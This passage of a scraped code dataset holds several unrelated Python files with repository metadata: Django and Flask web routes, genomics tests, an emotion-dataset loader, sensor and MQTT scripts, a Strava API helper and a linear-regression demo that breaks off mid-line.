True\n","repo_name":"Hydroviet/Modis","sub_path":"ModisUtils/modis_generator.py","file_name":"modis_generator.py","file_ext":"py","file_size_in_byte":3568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12340198985","text":"\"\"\"Expense Transaction URLs\"\"\"\nfrom django.conf.urls import url\n\nfrom .views import dashboard, add, edit, delete\n\napp_name = \"bank_institutions\"\n\nurlpatterns = [\n url(r\"^institution/add/$\", add, name=\"add\"),\n url(r\"^institution/edit/(?P\\d+)$\", edit, name=\"edit\"),\n url(r\"^institution/delete/(?P\\d+)$\", delete, name=\"delete\"),\n url(r\"^$\", dashboard, name=\"dashboard\"),\n]\n","repo_name":"studybuffalo/treasurer_tools","sub_path":"treasurer_tools/bank_institutions/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"73008062593","text":"from flask import request\r\nfrom flask.helpers import make_response\r\nfrom flask_restx import Namespace, Resource, fields\r\nfrom src.repositories import UserRepository as Repository #change this\r\nimport os\r\n\r\nresource_name = \"user\" #change this\r\nresource_title = resource_name.replace('-',' ').title()\r\napi = Namespace(resource_name, description=f'{resource_title} related operations')\r\n\r\napi_field = api.model(resource_title, { #change this\r\n 'place_of_birth': fields.String(required=False, description=f'place_of_birth {resource_name}'),\r\n 'date_of_birth': fields.String(required=False, description=f'date_of_birth {resource_name}'),\r\n 'phone': fields.String(required=False, description=f'phone {resource_name}'),\r\n 'home_address': fields.String(required=False, description=f'home_address {resource_name}'),\r\n 'email': fields.String(required=True, description=f'email {resource_name}'),\r\n 'first_name': fields.String(required=True, description=f'first_name {resource_name}'),\r\n 'last_name': fields.String(required=True, description=f'last_name {resource_name}'),\r\n 'password': fields.String(required=True, description=f'password {resource_name}'),\r\n 'is_admin': fields.String(required=True, description=f'is_admin {resource_name}'),\r\n\r\n 'is_active' : fields.Boolean(required=True, description=f'is_active for {resource_name}'),\r\n 'is_delete' : fields.Boolean(required=False, description=f'is_delete for {resource_name}', default=False),\r\n 'created_by' : fields.String(required=False, description=f'created_by for {resource_name}')\r\n})\r\n\r\n@api.route('')\r\nclass Module(Resource): #change this\r\n @api.doc(params={'page': 'Page ', 'pageSize': 'Size data per page', 'is_delete': 'Filter Delete data'})\r\n def get(self):\r\n data_list = Repository.list(request)\r\n return data_list, data_list['code']\r\n\r\n @api.expect(api_field)\r\n def post(self):\r\n data_create = Repository.create(request)\r\n return data_create, data_create['code']\r\n\r\n@api.route('/')\r\nclass ModuleWithId(Resource): \r\n @api.expect(api_field)\r\n def put(self, id): \r\n data_update = Repository.edit(id, request)\r\n return data_update, data_update['code']\r\n \r\n def get(self, id):\r\n data_show = Repository.show(id)\r\n return data_show, data_show['code']\r\n\r\n def delete(self, id):\r\n data_delete = Repository.remove(id)\r\n return data_delete, data_delete['code']\r\n\r\n","repo_name":"yosiasm/Flask-Framework","sub_path":"src/resources/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":2457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34870162176","text":"import os.path\nfrom pprint import pprint\nfrom unittest import TestCase\n\nfrom pyfaidx import Fasta\n\nfrom tasks.eva_2950.split_rs_with_inconsistent_ss import leftnorm, parse_eva2850_diagnositc_log, process_diagnostic_log\n\n\nclass TestNormalisation(TestCase):\n\n test_dir = os.path.dirname(__file__)\n\n def test_leftnorm(self):\n fasta_file = os.path.join(self.test_dir, 'fasta_file.fa')\n # Based on rs54131737\n fa = Fasta(fasta_file, as_raw=True, read_ahead=40000)\n chrom = 'AP014957.1'\n pos = 91\n ref = ''\n alt = 'TTTTT'\n assert (leftnorm(chrom, pos, ref, alt, fa=fa)) == (80, 'C', 'CTTTTT')\n pos = 81\n ref = ''\n alt = 'TTTTT'\n assert (leftnorm(chrom, pos, ref, alt, fa=fa)) == (80, 'C', 'CTTTTT')\n pos = 81\n ref = ''\n alt = 'T'\n assert (leftnorm(chrom, pos, ref, alt, fa=fa)) == (80, 'C', 'CT')\n pos = 91\n ref = ''\n alt = 'T'\n assert (leftnorm(chrom, pos, ref, alt, fa=fa)) == (80, 'C', 'CT')\n\n\nclass TestSplitRS(TestCase):\n\n test_dir = os.path.dirname(__file__)\n\n def test_parse_eva2850_diagnositc_log(self):\n diagnostic_file = os.path.join(self.test_dir, 'diagnostic_output_log.out')\n rsids = []\n lists_of_ssids = []\n for rsid, list_of_ssids in parse_eva2850_diagnositc_log(diagnostic_file):\n rsids.append(rsid)\n lists_of_ssids.append(list_of_ssids)\n\n assert [l['accession'] for list_of_ssids in lists_of_ssids for l in list_of_ssids] == [\n 71656146, 1961656906, 73429405, 71656146, 73429405, 73630724, 73526101, 1965862538, 73630724, 73526101,\n 1964358410, 73565740, 1964358413, 73565740\n ]\n assert rsids == [54131737, 53378121, 54319631]\n\n def test_process_diagnostic_log(self):\n diagnostic_file = os.path.join(self.test_dir, 'diagnostic_output_log.out')\n ref_genome_dir = os.path.join(self.test_dir, 'references')\n\n process_diagnostic_log(diagnostic_file, ref_genome_dir)\n","repo_name":"EBIvariation/eva-tasks","sub_path":"tasks/eva_2950/tests/test_split_rs_with_inconsistent_ss.py","file_name":"test_split_rs_with_inconsistent_ss.py","file_ext":"py","file_size_in_byte":2042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72853804034","text":"\r\nfrom keras.utils.np_utils import to_categorical\r\nimport pandas as pd\r\npd.set_option('mode.chained_assignment', None)\r\nimport numpy as np\r\nimport random\r\n\r\n\r\noriginal_facial_expression = {'Angry': 0,'Disgust': 1, 'Fear': 2, 'Happy': 3, 'Sad': 4, 'Surprise': 5,'Neutral': 6};\r\nfinal_facial_expresion = ['Angry','Disgust','Fear','Happy','Sad','Surprise','Neutral'];\r\n\r\n\r\ndef fnReconstruct(original_pixels, size=(48,48)):\r\n original_pixels = np.array(list(map(int, original_pixels.split())))\r\n return original_pixels.reshape(size)\r\n\r\ndef fnGetEmotionCount(y_private, classes, verbose=True):\r\n emo_classcount = {}\r\n for new_num, _class in enumerate(classes):\r\n y_private.loc[(y_private == original_facial_expression[_class])] = new_num\r\n class_count = sum(y_private == (new_num))\r\n if verbose:\r\n print('{}: {} with {} samples'.format(new_num, _class, class_count))\r\n emo_classcount[_class] = (new_num, class_count)\r\n return y_private.values, emo_classcount\r\n \r\n \r\ndef fnLoadData(Sample_split_fraction=0.3, usage='PrivateTest', boolCategorize=True, verbose=True,\r\ndefault_classes=['Angry', 'Happy'], filepath='data/fer2013.csv'):\r\n \r\n df = pd.read_csv(filepath)\r\n df = df[df.Usage == usage]\r\n frames = []\r\n for _class in default_classes:\r\n class_df = df[df['emotion'] == original_facial_expression[_class]]\r\n frames.append(class_df)\r\n data = pd.concat(frames, axis=0)\r\n rows = random.sample(list(data.index), int(len(data) * Sample_split_fraction))\r\n data = data.loc[rows]\r\n print ('{} set for {}: {}'.format(usage, default_classes, data.shape))\r\n data['pixels'] = data.pixels.apply(lambda x: fnReconstruct(x))\r\n x = np.array([mat for mat in data.pixels])\r\n X_private = x.reshape(-1, 1, x.shape[1], x.shape[2])\r\n Y_private, new_dict = fnGetEmotionCount(data.emotion, default_classes, verbose)\r\n print (new_dict)\r\n if boolCategorize:\r\n Y_private = to_categorical(Y_private)\r\n return X_private, Y_private, new_dict\r\n\r\n\r\n\r\ndef fnSaveData(X_private, Y_private, fname='', folder='data/'):\r\n np.save(folder + 'X_private' + fname, X_private)\r\n np.save(folder + 'Y_private' + fname, Y_private)\r\n \r\n \r\nif __name__ == '__main__':\r\n # makes the numpy arrays ready to use:\r\n print ('Making moves...')\r\n final_facial_expresion = ['Angry','Disgust','Fear','Happy','Sad','Surprise','Neutral']\r\n\r\n X_private, Y_private, emo_dict = fnLoadData(Sample_split_fraction=1.0,\r\n default_classes=final_facial_expresion,\r\n usage='PrivateTest',\r\n verbose=True)\r\n print ('Saving...')\r\n fnSaveData(X_private, Y_private, fname='_test')\r\n print (X_private.shape)\r\n print (Y_private.shape)\r\n print ('Done!')","repo_name":"Amir22010/deep","sub_path":"fer2013DataGenerator.py","file_name":"fer2013DataGenerator.py","file_ext":"py","file_size_in_byte":2878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22551573489","text":"#!/usr/bin/env python3\nfrom smbus2 import SMBus\nfrom ctypes import c_int8\nfrom sensor_msgs.msg import Imu\n\nimport signal, time, rospy\n\ndef keyboardInterruptHandler(signal,frame):\n print('Interrupted!')\n exit(0)\n\nsignal.signal(signal.SIGINT,keyboardInterruptHandler)\n\ndef Setup(ADXL375_DEVICE,OFSX,OFSY,OFSZ):\n #Power on ADXL375\n bus.write_byte_data(ADXL375_DEVICE, ADXL375_POWER_CTL,0) #Standby during setup\n bus.write_byte_data(ADXL375_DEVICE, ADXL375_BW_RATE, 9) #50Hz\n bus.write_byte_data(ADXL375_DEVICE, ADXL375_FIFO_CTL, 0) #Bypass\n bus.write_byte_data(ADXL375_DEVICE, ADXL375_POWER_CTL,8) #Setup finished - enter measuring mode\n \n\n #Set offset variables found through calibration script\n bus.write_byte_data(ADXL375_DEVICE, ADXL375_OFSX, OFSX)\n bus.write_byte_data(ADXL375_DEVICE, ADXL375_OFSY, OFSY)\n bus.write_byte_data(ADXL375_DEVICE, ADXL375_OFSZ, OFSZ)\n\ndef ReadAxes(ADXL375_DEVICE):\n block = bus.read_i2c_block_data(ADXL375_DEVICE,ADXL375_DATAX0,6)\n x_raw = c_int8(block[0]).value | c_int8(block[1]).value << 8\n x = x_raw/20.5\n y_raw = c_int8(block[2]).value | c_int8(block[3]).value << 8\n y = y_raw/20.5\n z_raw = c_int8(block[4]).value | c_int8(block[5]).value << 8\n z = z_raw/20.5\n #print(x_raw)\n return(x,y,z)\n\n#I2C channel\ni2c_ch = 0\n\n#Device address\nADXL375_DEVICE1 = 0x53\nADXL375_DEVICE2 = 0x1D\n\n#Register addresses\nADXL375_POWER_CTL = 0x2D\nADXL375_BW_RATE = 0x2C\nADXL375_FIFO_CTL = 0x38\nADXL375_DATAX0 = 0x32\nADXL375_OFSX = 0x1E\nADXL375_OFSY = 0x1F\nADXL375_OFSZ = 0x20\n\n#Initialize I2C (SMBus)\nbus = SMBus(i2c_ch)\n\n#Startup\nSetup(ADXL375_DEVICE1,-1,2,1)\n#Setup(ADXL375_DEVICE2,0,-2,-1)\n\nif __name__ == '__main__':\n pub1 = rospy.Publisher('ADXL375/Accel1', Imu, queue_size=10)\n pub2= rospy.Publisher('ADXL375/Accel2', Imu, queue_size=10)\n rospy.init_node('ADXL375', anonymous=True)\n rate = rospy.Rate(2000) #50hz\n data1 = Imu()\n data2 = Imu()\n\n while True:\n [x1,y1,z1] = ReadAxes(ADXL375_DEVICE1)\n #[x2,y2,z2] = ReadAxes(ADXL375_DEVICE2)\n [x2,y2,z2] = [1,2,3]\n\n data1.linear_acceleration.x = x1\n data1.linear_acceleration.y = y1\n data1.linear_acceleration.z = z1\n\n data2.linear_acceleration.x = x2\n data2.linear_acceleration.y = y2\n data2.linear_acceleration.z = z2\n\n pub1.publish(data1)\n pub2.publish(data2)\n rate.sleep()\n","repo_name":"MichaelJNielsen/adxl375_rosinterface","sub_path":"scripts/ADXL375_rospub.py","file_name":"ADXL375_rospub.py","file_ext":"py","file_size_in_byte":2409,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"5547836133","text":"# program menyimpan data peminjaman buku\r\n\r\ndataFile = open('PinjamBuku.txt', 'a')\r\n\r\nfrom datetime import *\r\n\r\n#membaca tangal sekarang\r\nskrg = datetime.date(datetime.now())\r\n\r\n#tanggal maksimal pengembalian\r\nkembali = skrg + timedelta(days=7)\r\n\r\ntglskrg = str(skrg)\r\ntglkembali = str(kembali)\r\n\r\nwhile True:\r\n kode = input('Masukkan Kode Member: ')\r\n nama = input('Masukkan Nama Member: ')\r\n judul = input('Masukkan Judul Buku: ')\r\n \r\n myString = kode+'|'+nama+'|'+judul+'|'+tglskrg+'|'+tglkembali+'\\n'\r\n dataFile.write(myString)\r\n ans = input('Ulangi lagi (y/n): ')\r\n if ans in ('N', 'n'):\r\n break\r\n \r\ndataFile.close()\r\n","repo_name":"sukmalarasati/Pemograman-Terstruktur","sub_path":"Chapter 11/Python Project 2.py","file_name":"Python Project 2.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13186938422","text":"import os\nfrom random import sample\nfrom math import floor\n\nimg_paths = os.listdir(\"./images\")\n\nvalidation_paths = sample(img_paths, floor(len(img_paths)*0.2))\ntraining_paths = [path for path in img_paths if path not in validation_paths]\n\nwith open(\"train.txt\", \"w\") as f:\n f.write(\"\\n\".join(f\"./images/{path}\" for path in training_paths))\n\nwith open(\"validation.txt\", \"w\") as f:\n f.write(\"\\n\".join(f\"./images/{path}\" for path in validation_paths))\n","repo_name":"AscendNTNU/startup-per24-data","sub_path":"data/fusion/gen_train_validation.py","file_name":"gen_train_validation.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72720646915","text":"import subprocess\nfrom subprocess import call\nimport paho.mqtt.client as mqtt\nimport os\n# This is the Subscriber\n\ndef on_connect(client, userdata, flags, rc):\n print(\"Connected with result code \"+str(rc))\n client.subscribe(\"test\")\n\ndef on_message(client, userdata, msg):\n if msg.payload.decode() == \"1\":\n os.system(\"/home/pi/cam.py\")\n client.disconnect()\n\nclient = mqtt.Client()\nclient.connect(\"10.71.56.173\",1883,60)\n\nclient.on_connect = on_connect\n","repo_name":"Uelimueli/W902","sub_path":"mos_sub.py","file_name":"mos_sub.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70083786116","text":"import collections\nimport datetime\nimport logging\nimport stravalib.client\nimport time\n\nlogger = logging.getLogger('strava-client')\nlogger.setLevel(logging.DEBUG)\n\nclass BaseException(Exception):\n pass\n\nclass ConfigError(BaseException):\n pass\n\nclass MyStravaClient(stravalib.client.Client):\n\n API_CALL_PAUSE_SECONDS = 1.5 # 40 requests per minute\n\n def get_all_gears(self):\n all_activities = self.get_activities()\n uniq_gear_ids = filter(None, set(activity.gear_id for activity in all_activities))\n gears = []\n for gear_id in uniq_gear_ids:\n time.sleep(self.API_CALL_PAUSE_SECONDS)\n gears.append(self.get_gear(gear_id))\n return gears\n\n def get_activities(self, before=None, after=None, limit=None):\n return list(stravalib.client.Client.get_activities(self, before=before, after=after, limit=limit))\n\n def get_activities_since(self, year, month, day, filter_types=['Ride']):\n start_date = datetime.datetime(year, month, day, 0, 0)\n matches = []\n activities_list = self.get_activities(after=start_date)\n for activity in activities_list:\n if activity.type in filter_types:\n matches.append(activity)\n return matches\n\n def get_activities_current_month(self, filter_types=['Ride']):\n # get first date of current month\n now = datetime.datetime.now()\n return self.get_activities_since(now.year, now.month, 1, filter_types=filter_types)\n\n def batch_set_privacy(self, activity_ids, private=True):\n updated_ids = []\n for each in activity_ids:\n try:\n logger.debug('Setting {id!s} privacy to {p!r}'.format(id=each, p=private))\n self.update_activity(each, private=private)\n except TypeError:\n # workaround for a bug in stravalib: Rate Limit errors are raised as \"TypeError: a float is required\"\n time.sleep(15) # naively cool down for 15 seconds, this works pretty well, implement exponential back-off later\n time.sleep(self.API_CALL_PAUSE_SECONDS)\n updated_ids.append(each)\n return updated_ids\n\n def batch_toggle_privacy(self, activity_ids):\n updated = self.batch_set_privacy(activity_ids, private=False)\n if raw_input('Toggle {n} activities back to private? y/n > '.format(n=len(updated))).lower() == 'y':\n updated = self.batch_set_privacy(updated, private=True)\n return updated\n\ndef summarize_gear_usage(activity_list):\n gear_usage_count_lookup = collections.defaultdict(int)\n gear_distance_lookup = collections.defaultdict(float)\n for activity in activity_list:\n gear_usage_count_lookup[activity.gear_id] += 1\n gear_distance_lookup[activity.gear_id] += activity.distance.get_num()\n return dict(gear_usage_count_lookup), dict(gear_distance_lookup)\n\n\ndef summarize(activities_list, short_ride_threshold=5.0):\n summary = {\n 'distance': 0.0,\n 'count_public': 0,\n 'distance_public': 0.0,\n 'distance_private': 0.0,\n 'private_ids': [],\n 'commute_ids': [],\n 'short_rides_ids': []\n }\n for activity in activities_list:\n summary['distance'] += activity.distance.get_num()\n activity_distance = activity.distance.get_num()\n if activity.private:\n summary['distance_private'] += activity_distance\n summary['private_ids'].append(activity.id)\n else:\n summary['count_public'] += 1\n summary['distance_public'] += activity_distance\n\n if (activity_distance / 1000.0) < short_ride_threshold:\n summary['short_rides_ids'].append(activity.id)\n\n if activity.commute:\n summary['commute_ids'].append(activity.id)\n # convert to kms\n for k in summary:\n if k.startswith('distance'):\n summary[k] = round(summary[k] / 1000.0, 1)\n summary['count_private'] = len(summary['private_ids'])\n summary['count_commute'] = len(summary['commute_ids'])\n return summary\n\n","repo_name":"anthonywu/strava-api-experiment","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4071,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"61"} +{"seq_id":"35834677884","text":"import random\r\nimport time\r\n\r\nimport numpy as np\r\n\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\nclass LR():\r\n def __init__(self, a_train, b_train, a_test, b_test, method):\r\n self.start_time = 0\r\n self.end_time = 0\r\n self.start_time = time.time()\r\n self.accu_train = 0\r\n self.accu_test = 0\r\n\r\n if method == 'Linear Regression':\r\n self.X_mat = np.mat([0, 0, 0]) # 矩阵初始化\r\n for a in a_train:\r\n self.X_mat = np.r_[self.X_mat, np.mat([a['x1'], a['x2'], a['bias']])] # 行扩展\r\n for b in b_train:\r\n self.X_mat = np.r_[self.X_mat, np.mat([b['x1'], b['x2'], b['bias']])] # 行扩展\r\n np.delete(self.X_mat, 0, 0) # 删除第一行\r\n print(self.X_mat) # 输出矩阵\r\n\r\n self.Y_mat = np.mat([0]) # 矩阵初始化\r\n for a in a_train:\r\n self.Y_mat = np.r_[self.Y_mat, np.mat(a['y'])] # 行扩展\r\n for b in b_train:\r\n self.Y_mat = np.r_[self.Y_mat, np.mat(b['y'])] # 行扩展\r\n np.delete(self.Y_mat, 0, 0) # 输出矩阵\r\n\r\n self.X_T__X = self.X_mat.T * self.X_mat\r\n self.X_generalized_inverse = self.X_T__X.I * self.X_mat.T # 得到广义逆\r\n\r\n self.best_w_mat = self.X_generalized_inverse * self.Y_mat\r\n self.best_w = self.best_w_mat.tolist()\r\n self.best_w[0] = self.best_w[0][0]\r\n self.best_w[1] = self.best_w[1][0]\r\n self.best_w[2] = self.best_w[2][0]\r\n\r\n print('The X_generalized_inverse is ' + str(self.X_generalized_inverse))\r\n\r\n print('The best w is ' + str(self.best_w))\r\n self.judge(a_train, b_train)\r\n\r\n if method == 'gradient descent':\r\n self.epoch = 1000 # 整个样本集遍历多少次\r\n self.batch = 400 # batch的大小,因为我们的训练样本集大小为320,所以batch大小应该是320的因子\r\n self.yita = 0.01 # 学习步长\r\n self.loss_list = []\r\n self.w = self.initialize_w(a_train, b_train)\r\n self.best_w = self.w.copy()\r\n self.gradient_descent_train(a_train, b_train)\r\n print('the final w is ' + str(self.best_w))\r\n self.judge(a_train, b_train)\r\n\r\n self.draw_train(a_train, b_train, method)\r\n # self.test(a_test, b_test)\r\n\r\n def initialize_w(self, a_train, b_train):\r\n '''\r\n 随机生成101个w,取其中损失函数最小的作为初始化的w\r\n :param a_train:\r\n :param b_train:\r\n :return:\r\n '''\r\n w = [0, 0, 0]\r\n w[0] = random.uniform(-100, 100)\r\n w[1] = random.uniform(-100, 100)\r\n w[2] = random.uniform(-100, 100)\r\n train = a_train.copy() + b_train.copy()\r\n best_initialize_Lin = 0\r\n for t in train:\r\n best_initialize_Lin += (w[0] * t['x1'] + w[1] * t['x2'] + w[2] * t['bias'] - t['y']) ** 2\r\n best_initialize_Lin = best_initialize_Lin / len(train)\r\n\r\n best_initialize_w = w.copy()\r\n for i in range(100):\r\n w[0] = random.uniform(-100, 100)\r\n w[1] = random.uniform(-100, 100)\r\n w[2] = random.uniform(-100, 100)\r\n initialize_Lin = 0\r\n for t in train:\r\n initialize_Lin = initialize_Lin + (w[0] * t['x1'] + w[1] * t['x2'] + w[2] * t['bias'] - t['y']) ** 2\r\n initialize_Lin = initialize_Lin / len(train)\r\n if initialize_Lin < best_initialize_Lin:\r\n best_initialize_Lin = initialize_Lin\r\n best_initialize_w = w.copy()\r\n print('now w ' + str(w))\r\n print('best w ' + str(best_initialize_w))\r\n print(' ')\r\n return best_initialize_w\r\n\r\n def gradient_descent_train(self, a_train, b_train):\r\n train = a_train.copy() + b_train.copy()\r\n for i in range(self.epoch): # 将整个数据集遍历多少次\r\n random.shuffle(train)\r\n loss = 0\r\n for j in range(int(each_train_num / self.batch)): # 在每一次数据集的遍历中,对每一个batch进行循环\r\n grad_Lin = [0, 0, 0]\r\n for k in range(self.batch): # 处理每个batch中的样本,即迭代一次w\r\n grad_Lin[0] += (self.w[0] * train[j * self.batch + k]['x1'] + self.w[1] * train[j * self.batch + k][\r\n 'x2'] + self.w[2] * train[j * self.batch + k]['bias'] - train[j * self.batch + k]['y']) * \\\r\n train[j * self.batch + k]['x1']\r\n\r\n grad_Lin[1] += (self.w[0] * train[j * self.batch + k]['x1'] + self.w[1] * train[j * self.batch + k][\r\n 'x2'] + self.w[2] * train[j * self.batch + k]['bias'] - train[j * self.batch + k]['y']) * \\\r\n train[j * self.batch + k]['x2']\r\n\r\n grad_Lin[2] += (self.w[0] * train[j * self.batch + k]['x1'] + self.w[1] * train[j * self.batch + k][\r\n 'x2'] + self.w[2] * train[j * self.batch + k]['bias'] - train[j * self.batch + k]['y']) * \\\r\n train[j * self.batch + k]['bias']\r\n grad_Lin[0] = grad_Lin[0] * 2 / self.batch\r\n grad_Lin[1] = grad_Lin[1] * 2 / self.batch\r\n grad_Lin[2] = grad_Lin[2] * 2 / self.batch\r\n\r\n self.w[0] = self.w[0] - self.yita * grad_Lin[0]\r\n self.w[1] = self.w[1] - self.yita * grad_Lin[1]\r\n self.w[2] = self.w[2] - self.yita * grad_Lin[2]\r\n for t in train:\r\n loss += (self.w[0] * t['x1'] + self.w[1] * t['x2'] + self.w[2] * t['bias'] - t['y']) ** 2\r\n\r\n self.loss_list.append(loss)\r\n self.best_w = self.w.copy()\r\n\r\n def judge(self, a_train, b_train):\r\n '''\r\n 用于判断训练集中哪些样本分类正确和分类错误,并且计算总的正确率\r\n :param a_train:\r\n :param b_train:\r\n :return:\r\n '''\r\n self.accu_train = len(a_train) + len(b_train)\r\n for i in range(0, len(a_train)):\r\n t = a_train[i]['x1'] * self.best_w[0] + a_train[i]['x2'] * self.best_w[1] + a_train[i]['bias'] * \\\r\n self.best_w[2]\r\n if t > 0:\r\n a_train[i]['y_'] = 1\r\n elif t < 0:\r\n a_train[i]['y_'] = -1\r\n else:\r\n a_train[i]['y_'] = 0\r\n\r\n if a_train[i]['y'] != a_train[i]['y_']:\r\n self.accu_train = self.accu_train - 1\r\n\r\n for i in range(0, len(b_train)):\r\n t = b_train[i]['x1'] * self.best_w[0] + b_train[i]['x2'] * self.best_w[1] + b_train[i]['bias'] * \\\r\n self.best_w[2]\r\n if t > 0:\r\n b_train[i]['y_'] = 1\r\n elif t < 0:\r\n b_train[i]['y_'] = -1\r\n else:\r\n b_train[i]['y_'] = 0\r\n\r\n if b_train[i]['y'] != b_train[i]['y_']:\r\n self.accu_train = self.accu_train - 1\r\n\r\n def draw_train(self, a_train, b_train, method):\r\n '''\r\n 将训练样本在2维图中画出来,并且把最佳分类面画出来,输出最佳分类面在训练数据集中的最佳正确率\r\n :param a_train:\r\n :param b_train:\r\n :return:\r\n '''\r\n if method == 'gradient descent':\r\n plt.figure()\r\n plt.plot(range(self.epoch), self.loss_list)\r\n plt.xlabel(\"epoch\", fontdict = {'size': 16})\r\n plt.ylabel(\"Lin\", fontdict = {'size': 16})\r\n\r\n plt.figure()\r\n for a in a_train:\r\n plt.scatter(a['x1'], a['x2'], c = 'red', s = 1, label = 'a')\r\n for b in b_train:\r\n plt.scatter(b['x1'], b['x2'], c = 'blue', s = 1, label = 'b')\r\n\r\n plt.plot([-5, 5], [-(self.best_w[0] * (-5) + self.best_w[2]) / self.best_w[1],\r\n -(self.best_w[0] * 5 + self.best_w[2]) / self.best_w[1]],\r\n c = 'green')\r\n\r\n plt.xlabel(\"x1\", fontdict = {'size': 16})\r\n plt.ylabel(\"x2\", fontdict = {'size': 16})\r\n print('The best accuracy in the training is ' + str(self.accu_train / each_train_num / 2))\r\n plt.show()\r\n\r\n def test(self, a_test, b_test):\r\n '''\r\n 检测训练出来的最佳分类面在测试数据集上的正确率,并找出哪些样本分类正确,哪些样本分类错误,最后调用画图函数在二维图中画出测试样本的位置\r\n :param a_test:\r\n :param b_test:\r\n :return:\r\n '''\r\n self.accu_test = len(a_test) + len(b_test)\r\n for i in range(0, len(a_test)):\r\n t = a_test[i]['x1'] * self.best_w[0] + a_test[i]['x2'] * self.best_w[1] + a_test[i]['bias'] * \\\r\n self.best_w[2]\r\n if t > 0:\r\n a_test[i]['y_'] = 1\r\n elif t < 0:\r\n a_test[i]['y_'] = -1\r\n else:\r\n a_test[i]['y_'] = 0\r\n\r\n if a_test[i]['y'] != a_test[i]['y_']:\r\n self.accu_test = self.accu_test - 1\r\n\r\n for i in range(0, len(b_test)):\r\n t = b_test[i]['x1'] * self.best_w[0] + b_test[i]['x2'] * self.best_w[1] + b_test[i]['bias'] * \\\r\n self.best_w[2]\r\n if t > 0:\r\n b_test[i]['y_'] = 1\r\n elif t < 0:\r\n b_test[i]['y_'] = -1\r\n else:\r\n b_test[i]['y_'] = 0\r\n\r\n if b_test[i]['y'] != b_test[i]['y_']:\r\n self.accu_test = self.accu_test - 1\r\n print('\\nThe test accuracy is ' + str(self.accu_test / each_test_num / 2))\r\n self.draw_test(a_test, b_test)\r\n\r\n def draw_test(self, a_test, b_test):\r\n '''\r\n 画出测试样本在二维图中的位置\r\n :param a_test:\r\n :param b_test:\r\n :return:\r\n '''\r\n\r\n for a in a_test:\r\n plt.scatter(a['x1'], a['x2'], c = 'red', s = 30, label = 'a', marker = '+')\r\n for b in b_test:\r\n plt.scatter(b['x1'], b['x2'], c = 'blue', s = 30, label = 'b', marker = '+')\r\n\r\n plt.xlabel(\"x1\", fontdict = {'size': 16})\r\n plt.ylabel(\"x2\", fontdict = {'size': 16})\r\n self.end_time = time.time()\r\n print('The usage of the time is ' + str(self.end_time - self.start_time) + 's')\r\n plt.show()\r\n\r\n\r\ndef create_points(each_train_num, each_test_num):\r\n '''\r\n 生成训练和测试用的正态分布点\r\n :return:\r\n '''\r\n\r\n a_train = []\r\n b_train = []\r\n a_test = []\r\n b_test = []\r\n\r\n for i in range(0, each_train_num):\r\n # a组训练样本初始化\r\n a_train.append({})\r\n a_train[i]['x1'] = np.random.normal(loc = 1.0, scale = 1.0)\r\n a_train[i]['x2'] = np.random.normal(loc = 0.0, scale = 1.0)\r\n a_train[i]['bias'] = 1\r\n a_train[i]['y'] = 1\r\n a_train[i]['y_'] = 0\r\n\r\n # b组训练样本初始化\r\n b_train.append({})\r\n b_train[i]['x1'] = np.random.normal(loc = 0.0, scale = 1.0)\r\n b_train[i]['x2'] = np.random.normal(loc = -1.0, scale = 1.0)\r\n b_train[i]['bias'] = 1\r\n b_train[i]['y'] = -1\r\n b_train[i]['y_'] = 0\r\n\r\n for i in range(0, each_test_num):\r\n # a组测试样本初始化\r\n a_test.append({})\r\n a_test[i]['x1'] = np.random.normal(loc = 1.0, scale = 1.0)\r\n a_test[i]['x2'] = np.random.normal(loc = 0.0, scale = 1.0)\r\n a_test[i]['bias'] = 1\r\n a_test[i]['y'] = 1\r\n a_test[i]['y_'] = 0\r\n\r\n # b组测试样本初始化\r\n b_test.append({})\r\n b_test[i]['x1'] = np.random.normal(loc = 0.0, scale = 1.0)\r\n b_test[i]['x2'] = np.random.normal(loc = -1.0, scale = 1.0)\r\n b_test[i]['bias'] = 1\r\n b_test[i]['y'] = -1\r\n b_test[i]['y_'] = 0\r\n\r\n return [a_train, b_train, a_test, b_test]\r\n\r\n\r\neach_train_num = 200\r\neach_test_num = 40\r\n[a_train, b_train, a_test, b_test] = create_points(each_train_num, each_test_num)\r\n# demo = LR(a_train, b_train, a_test, b_test, 'gradient descent')\r\na_train = [{'x1': 0.2, 'x2': 0.7, 'bias': 1, 'y': 1, 'y_': 0},\r\n {'x1': 0.3, 'x2': 0.3, 'bias': 1, 'y': 1, 'y_': 0},\r\n {'x1': 0.4, 'x2': 0.5, 'bias': 1, 'y': 1, 'y_': 0},\r\n {'x1': 0.6, 'x2': 0.5, 'bias': 1, 'y': 1, 'y_': 0},\r\n {'x1': 0.1, 'x2': 0.4, 'bias': 1, 'y': 1, 'y_': 0},\r\n ]\r\nb_train = [{'x1': 0.4, 'x2': 0.6, 'bias': 1, 'y': -1, 'y_': 0},\r\n {'x1': 0.6, 'x2': 0.2, 'bias': 1, 'y': -1, 'y_': 0},\r\n {'x1': 0.7, 'x2': 0.4, 'bias': 1, 'y': -1, 'y_': 0},\r\n {'x1': 0.8, 'x2': 0.6, 'bias': 1, 'y': -1, 'y_': 0},\r\n {'x1': 0.7, 'x2': 0.5, 'bias': 1, 'y': -1, 'y_': 0},\r\n ]\r\n\r\ndemo = LR(a_train, b_train, a_test, b_test, 'Linear 